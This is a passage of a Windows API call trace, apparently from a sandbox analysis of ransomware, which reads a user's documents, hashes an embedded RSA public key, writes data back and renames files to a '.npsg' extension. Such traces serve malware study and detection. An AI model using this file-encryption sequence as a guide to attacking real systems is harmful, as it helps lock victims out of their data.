[0246.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0246.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89288 | out: hHeap=0x620000) returned 1 [0246.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b80030 [0246.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b892b8 | out: hHeap=0x620000) returned 1 [0246.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x33e3b68 [0246.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7fe00 [0246.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0246.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ff18 [0246.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89228 | out: hHeap=0x620000) returned 1 [0246.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b947f8 [0246.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b80030 | out: hHeap=0x620000) returned 1 [0246.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33a9510 [0246.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0246.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a110 | out: hHeap=0x620000) returned 1 [0246.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0246.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a9510 | out: hHeap=0x620000) returned 1 [0246.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0246.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ff18 | out: hHeap=0x620000) returned 1 [0246.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33e3b68 | out: hHeap=0x620000) returned 1 [0246.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0246.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7fe00 | out: hHeap=0x620000) returned 1 [0246.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0246.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89258 | out: hHeap=0x620000) returned 1 [0246.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0246.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b892a0 | out: hHeap=0x620000) returned 1 [0246.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8660 | out: hHeap=0x620000) returned 1 [0246.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89240 | out: hHeap=0x620000) returned 1 [0246.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89210 | out: hHeap=0x620000) returned 1 [0246.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0246.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0246.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0246.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891f8 | out: hHeap=0x620000) returned 1 [0246.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90228 | out: hHeap=0x620000) returned 1 [0246.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0246.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3384ae0 | out: hHeap=0x620000) returned 1 [0246.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4ac0 | out: hHeap=0x620000) returned 1 [0246.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7fce8 | out: hHeap=0x620000) returned 1 [0246.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0246.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0246.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0246.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0246.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0246.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0246.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0246.570] WriteFile (in: hFile=0x644, lpBuffer=0x3b99d50*, nNumberOfBytesToWrite=0x135cf, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b99d50*, lpNumberOfBytesWritten=0x39afb14*=0x135cf, lpOverlapped=0x0) returned 1 [0246.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b99d50 | out: hHeap=0x620000) returned 1 [0246.571] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x135d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.571] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0246.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0246.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0246.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0246.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0246.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa00 [0246.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0246.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d188 | out: hHeap=0x620000) returned 1 [0246.572] WriteFile (in: hFile=0x644, lpBuffer=0x346fa00*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa00*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0246.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa00 | out: hHeap=0x620000) returned 1 [0246.572] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0246.572] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0246.572] CloseHandle (hObject=0x644) returned 1 [0246.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8c8b0 [0246.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e0) returned 0x3b8ccd0 [0246.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8c8b0 | out: hHeap=0x620000) returned 1 [0246.576] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\wX25LV54WV\\Ck7Alt.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\wx25lv54wv\\ck7alt.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\wX25LV54WV\\Ck7Alt.pdf.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\wx25lv54wv\\ck7alt.pdf.npsg")) returned 1 [0246.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.577] VirtualFree (lpAddress=0x39b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0246.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0246.579] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27f030f0, ftCreationTime.dwHighDateTime=0x1d5bbf2, ftLastAccessTime.dwLowDateTime=0x99770170, ftLastAccessTime.dwHighDateTime=0x1d5b744, ftLastWriteTime.dwLowDateTime=0x99770170, ftLastWriteTime.dwHighDateTime=0x1d5b744, nFileSizeHigh=0x0, nFileSizeLow=0xfd32, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="l_ORy5rqruJc7p2to.docx", cAlternateFileName="L_ORY5~1.DOC")) returned 1 [0246.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11e) returned 0x6affc0 [0246.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.579] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\wX25LV54WV\\l_ORy5rqruJc7p2to.docx") returned=".docx" [0246.579] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\wX25LV54WV\\l_ORy5rqruJc7p2to.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\wx25lv54wv\\l_ory5rqrujc7p2to.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0246.579] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=64818) returned 1 [0246.579] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0246.582] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xfd0c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.582] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0246.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0246.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.583] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.583] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0xfd32, lpOverlapped=0x0) returned 1 [0246.584] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0246.584] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.584] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.584] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a110) returned 1 [0246.585] CryptCreateHash (in: hProv=0x67a110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0246.585] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0246.585] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0246.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0246.585] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0246.585] GetLastError () returned 0x0 [0246.585] CryptDestroyHash (hHash=0x33f0488) returned 1 [0246.585] CryptReleaseContext (hProv=0x67a110, dwFlags=0x0) returned 1 [0246.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0246.585] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0246.586] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0246.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0246.586] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0246.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0246.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd30) returned 0x3b99d50 [0246.586] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0246.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0246.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0246.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0246.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0246.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0246.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b90228 [0246.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b891f8 [0246.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b90270 [0246.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89210 [0246.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89240 [0246.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b892a0 [0246.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89258 [0246.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0246.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7b830 [0246.587] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7b830, Size=0x218) returned 0x3b90a38 [0246.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa00 [0246.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89240 | out: hHeap=0x620000) returned 1 [0246.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89258 | out: hHeap=0x620000) returned 1 [0246.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b892a0 | out: hHeap=0x620000) returned 1 [0246.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0246.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa00 | out: hHeap=0x620000) returned 1 [0246.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b892a0 [0246.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0246.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89258 [0246.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0246.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b89240 [0246.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0246.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7fce8 [0246.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0246.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0246.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0246.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7fe00 [0246.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8660 [0246.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0246.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7fce8 | out: hHeap=0x620000) returned 1 [0246.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89258 | out: hHeap=0x620000) returned 1 [0246.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0246.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89240 | out: hHeap=0x620000) returned 1 [0246.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0246.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0246.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b892a0 | out: hHeap=0x620000) returned 1 [0246.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0246.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0246.588] GetCurrentThreadId () returned 0x5b4 [0246.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0246.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b8b248 [0246.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c1920 [0246.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a110 [0246.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0246.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0246.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0246.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0246.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.588] GetCurrentThreadId () returned 0x5b4 [0246.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x64dd08 [0246.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0246.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0246.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0246.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c4ac0 [0246.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0246.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3384ae0 [0246.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0246.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b892a0 [0246.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0246.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0246.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0246.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x33734f8 [0246.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0246.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0246.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0246.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0246.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89240 [0246.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0246.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0246.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0246.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0246.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0246.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0246.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0246.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89258 [0246.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0246.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0246.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0246.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89228 [0246.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0246.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b892b8 [0246.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0246.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0246.590] HeapFree (in: 